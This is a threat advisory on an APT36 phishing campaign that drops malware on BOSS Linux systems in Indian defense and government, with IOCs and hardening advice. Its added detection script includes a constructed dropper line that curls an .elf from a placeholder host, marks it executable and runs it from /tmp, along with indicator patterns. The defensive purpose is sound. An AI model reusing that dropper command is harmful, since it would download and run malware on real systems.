APT36 Targets Indian Defense via BOSS Linux with Phishing Tactics


This campaign demonstrates an advanced evolution in APT36’s capabilities, marking one of the first large-scale Linux-specific phishing operations attributed to the group. The use of .desktop files as droppers and the seamless deployment of ELF binaries indicate deep operational planning aimed at stealth and persistence.

Severity Level: High

Threat Overview

  • Threat Actor: APT36 (Transparent Tribe)
  • Motivation: Cyber-espionage against Indian targets
  • Malware Components: Cyber-Security-Advisory.desktop (launcher), BOSS.elf (payload)
  • Primarily Targeted: India
  • Affected / Targeted Sectors: Indian Defense Sector, Government Agencies
  • Affected Products / Versions: BOSS Linux (Linux distribution used in Indian government)

Attack Flow

  1. Victim receives phishing email with ZIP attachment.
  2. ZIP contains a .desktop shortcut file.
  3. Clicking executes commands:
    • Downloads and opens decoy slide.pptx (iframe-based).
    • Simultaneously downloads BOSS.elf binary.
  4. Execution strategy: uses bash scripting, curl, nohup, and chmod, and runs silently from /tmp.
  5. Malware connects to remote C2 server 101.99.92[.]182 on port 12520.
  6. Collects system info, takes screenshots, exfiltrates data silently.
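As an added triage example (not part of the advisory, and not the campaign's real .desktop file), the following Python script parses a .desktop attachment's Exec= line, unwraps any inline bash -c body, and flags the dropper traits listed in the attack flow above: a curl download, chmod, nohup, execution from /tmp, an .elf payload and a decoy document. The sample entries and the .invalid hostnames in them are constructed.

```python
"""Triage helper for .desktop attachments: flags Exec= lines showing the dropper pattern
from the attack flow above. Added example; the sample files below are constructed."""
import configparser
import re
import shlex

# Each indicator is tested against every token of the fully unwrapped Exec= command line.
INDICATORS = [
    ("downloads_with_curl_or_wget", re.compile(r"^(curl|wget)$")),
    ("marks_executable_with_chmod", re.compile(r"^chmod$")),
    ("detaches_with_nohup", re.compile(r"^nohup$")),
    ("uses_tmp_directory", re.compile(r"^/(tmp|var/tmp|dev/shm)/")),
    ("references_elf_payload", re.compile(r"\.elf$", re.IGNORECASE)),
    ("opens_decoy_document", re.compile(r"\.(pptx?|docx?|pdf)$", re.IGNORECASE)),
]

def exec_command(desktop_text: str) -> str:
    """Return the Exec= value of the [Desktop Entry] group, or '' if absent."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.read_string(desktop_text)
    return parser.get("Desktop Entry", "Exec", fallback="")

def exec_tokens(command: str) -> list:
    """Split shell-style (also on ; & |) and unwrap inline bodies like bash -c '...'."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    lexer.commenters = ""  # keep '#' so URL fragments are not silently dropped
    try:
        tokens = []
        for tok in lexer:
            tokens.extend(exec_tokens(tok) if any(c.isspace() for c in tok) else [tok])
        return tokens
    except ValueError:  # unbalanced quotes: fall back to a plain whitespace split
        return command.split()

def triage(desktop_text: str) -> dict:
    """Score one .desktop file; 'suspicious' is set when three or more indicators match."""
    tokens = exec_tokens(exec_command(desktop_text))
    hits = [name for name, rx in INDICATORS if any(rx.search(t) for t in tokens)]
    return {"hits": hits, "suspicious": len(hits) >= 3}

# Constructed samples on placeholder .invalid hosts, not the real campaign files.
SAMPLE_DROPPER = """[Desktop Entry]
Type=Application
Exec=bash -c "curl -s -o /tmp/slide.pptx https://decoy.example.invalid/slide.pptx; xdg-open /tmp/slide.pptx; curl -s -o /tmp/p.elf https://c2.example.invalid/p.elf; chmod +x /tmp/p.elf; nohup /tmp/p.elf >/dev/null 2>&1 &"
"""
SAMPLE_BENIGN = """[Desktop Entry]
Type=Application
Exec=gedit %U
"""
```

Run it over every .desktop file extracted from a mail-gateway or sandbox ZIP; the three-hit threshold keeps ordinary launchers (editors, browsers, document viewers) below the line.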

Recommendations

1. Email & Endpoint Hardening

  • Block .desktop and .elf file types in email.
  • Disable execution of email attachments by default, unless explicitly verified.
  • Use sandbox analysis for attachments.

2. User Awareness

  • Conduct phishing simulation and awareness programs.
  • Train personnel on attachment and link safety.

3. System and Application Hardening

  • Ensure BOSS Linux systems and all open-source applications (such as LibreOffice and curl) are up to date with the latest security patches to reduce exploitation vectors.
  • Apply execution restrictions on /tmp and similar directories.
  • Block execution of unknown binaries downloaded via scripts unless verified and signed by the organization.

4. Network Defences and EDR

  • Monitor port 12520 for unauthorized connections.
  • Segment networks to contain potential intrusions.
  • Deploy EDR (Endpoint Detection and Response) tools capable of detecting Linux threats, unauthorized process execution, and unusual network behaviour.

5. Block the IOCs at their respective controls.
https://www.virustotal.com/gui/collection/0c3a954cecd68a3aeea320cf7f445742dce90878b62d71964725ae979730dbb9/iocs

Source:

  • https://www.cyfirma.com/research/phishing-attack-deploying-malware-on-indian-defense-boss-linux/


Ampcus Cyber